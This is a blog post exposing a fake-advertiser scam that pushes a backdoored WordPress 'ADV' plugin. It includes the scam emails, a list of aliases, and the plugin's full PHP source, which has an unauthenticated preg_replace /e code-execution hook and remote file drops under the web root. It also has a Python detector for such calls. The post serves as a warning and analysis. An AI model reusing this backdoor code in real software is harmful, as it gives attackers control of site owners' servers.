get a Merry Christmas banner
Yesterday I got an interesting email through the contact page on my site inquiring about the advertisement slot on Astronyu.com. The guy (presumably, from the name) was called Erwan Brun and was using the email [email protected]. He introduced himself as being from an advertising company called Bizotto with a client interested in buying an advertising spot on my site.
Flag #1: Advertiser
This makes me chuckle, to be honest. In his email he claimed Lacoste Inc (I’m a HUGE fan) is interested in buying an advertising spot on my low-traffic blog, which is totally impossible.
Flag #2: The Email Conversation
Hello, Thanks for reply to our proposal! I represent Bizotto Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160x600, 240x400, 300x250, 336x280, 468x60, 728x90. What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month. Unfortunately, we can't place our banners through the mentioned system. All our banners must be controlled by the plug-in, it is advertiser's requirement. If you are willing to work this way, please provide us with the information we requested above. Best regards, Erwan Brun. site: www.bizotto.com e-mail: [email protected] phone: + (0)9 78 62 93 64
Soon after I replied to his email with the pricing table, I received his response.
Hi! Thanks for reply to our proposal! We like your price. To pass to the banner control system follow the link http://webmaster.bizotto.com To enter use the following data: login: www.astronyu.com password: HIK3B1M You should install and activate the plugin in order to display advertisement. Before making payment, advertiser must approve location of the banner. The banner will be shown on your site when you add special code to your web-address (for example: http://www.astronyu.com/?adv_test=1). It means, that visitors will see the banner only if it is approved and payment made. To get installation instruction for your site type pass to: http://docs.bizotto.com/wp_install To activate your site you have to enter the code: K3M-ZBT-S9N What way of payment is suitable for you? Best regards, Erwan Brun. site: www.bizotto.com e-mail: [email protected] phone: + (0)9 78 62 93 64
I’m a bit skeptical when it comes to installing a plugin without knowing anything about it, so the second I received this email I looked it up on Google and, surprisingly, there are tons of results about the same scam happening all over the net. As I did not install the plugin, I have zilch clue what it will do to my site or, worse, my server, but boy I’m glad I have Google. 🙂
So boys and girls, be extra careful when someone asks you to install something when you have no idea what it does; always check the Internet. If you find a scam, you can file a complaint (like I did) with the FBI by completing the form at www.ic3.gov (Internet Crime Complaint), and be sure to have the sender’s email headers handy. If you are interested in a decent banner professional (let’s say you want to get a Merry Christmas banner), we are at your disposal.
Here are some of the names and companies being used in this kind of scam:
- Erwan Brun / Bizotto Agency
- Noah Vincent / Legretto Agency
- Tristan Muller / Gana Agency
- Valentin Lopez / Gera Agency
- Matthieu Colin / NanaAgency
- Oscar Meunier / Kervel Agency
- Eliott Arnaud / Larko Agency
- Lilian Marchand / Lemma Agency
- Rayan Meyer / Bevesto Agency
- and others …
All of them use the same website template (a French website with an orange theme).
If you’re talented in PHP, maybe you can find what’s being hidden in this code (downloaded from the scam site cum control panel):
```php
<?php
/*
Plugin Name: ADV
Description: ADV Plugin
Version: 2.6.1
*/
class AdvWidget extends WP_Widget {
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {
    }
}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
add_action('admin_menu', 'advPluginMenu');
register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'bizotto.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

// Fetches a URL from the remote service over plain HTTP (cURL if available).
function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

// Sends the activation key and this site's host name to the remote service.
function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" .
        urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message" class="updated"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message" class="updated"><p>Code activation error.</p></div>';
    }
}

// Directory names, file names and file contents below all come from the remote
// service's response. Nothing restricts the file extension, so the service
// decides what is written under the web root.
function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile,
                    advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message" class="updated"><p>Banners are downloaded successfully.</p></div>';
    }
}

// Not inside any function: this runs every time the plugin file is loaded, for
// any visitor, with no capability check. Both the regex pattern and the
// replacement come straight from the request; on PHP < 7.0 a pattern carrying
// the /e modifier makes preg_replace() evaluate the replacement as PHP code.
// The fixed subject 'adv 6' and the unused $r show the call serves no banner purpose.
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
    $advPlace = get_option('adv_place');
    echo '<div class="wrap">';
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment. To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
?>
```
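A static triage check for the request-driven `preg_replace` call in the listing above, as an added example that is not part of the original post or of the plugin: it flags code-executing PHP calls whose arguments are taken from request superglobals. The function names and the `SAMPLE` excerpt (statements copied from the listing and re-wrapped) are constructed for illustration, and the match is a text heuristic, not a PHP parser.

```python
import re

# Request data an unauthenticated visitor controls.
TAINT = re.compile(r"\$_(?:REQUEST|POST|GET|COOKIE)\b")
# Calls that execute code; preg_replace does so under the /e modifier (PHP < 7.0).
SINKS = re.compile(
    r"\b(preg_replace|eval|assert|create_function|call_user_func(?:_array)?)\s*\(")

# Constructed sample: statements taken from the plugin listing, re-wrapped.
SAMPLE = r'''<?php
add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
update_option('adv_place', $_REQUEST['adv_place']);
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']),
                      str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
'''

def call_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')', ignoring parens in strings."""
    depth, quote, i = 0, None, open_idx
    while i < len(src):
        ch = src[i]
        if quote:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
        i += 1
    return src[open_idx + 1:]               # unbalanced input: take the rest

def find_request_driven_sinks(src):
    """Return (line, function, superglobals) for each sink fed by request data."""
    findings = []
    for m in SINKS.finditer(src):
        tainted = sorted(set(TAINT.findall(call_args(src, m.end() - 1))))
        if tainted:
            findings.append((src.count("\n", 0, m.start()) + 1, m.group(1), tainted))
    return findings

if __name__ == "__main__":
    print(find_request_driven_sinks(SAMPLE))
```

The `create_function` call and the `update_option` call in the sample are not reported: the first has no request data in its arguments and the second is not a code-executing call.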
[UPDATE]
I finally replied saying I know about the scam and not to contact me anymore. As I suspected, I got the same generic reply. LoL... seriously, whoever is running this scam must have a lot of time on their hands, or it is possible this is just a script.
Hi! Unfortunately, the advertiser rejected your site. He has already gained the required number of advertising platforms for this season. Sorry for trouble you. You can remove plug-in. As soon as our client resumes an advertising campaign we will contact you. Thank you and hope to cooperate with you in the future! Best regards, Erwan Brun. site: www.bizotto.com e-mail: [email protected] phone: + (0)9 78 62 93 64
I want to buy and install this in my computer to remove a lot of scam it cause damage in your pc…
I don’t like any malicious.. I would try to find some plug in for this.. Scam is such a malicious kind.. Thank you for sharing this kind of post informative..
Add this name to the list:
Noa Joly
site: www.anriagency.com
e-mail: [email protected]
@dougunplugged sure, I’ll add it to the list. Thanks.
Fortunately this version isn’t malicious – YET , think they were harvesting info. I got hit as well 🙁
@jamesyeang Yeah, I too checked my server just in case there is something created after I installed the plugin and so far haven’t found anything.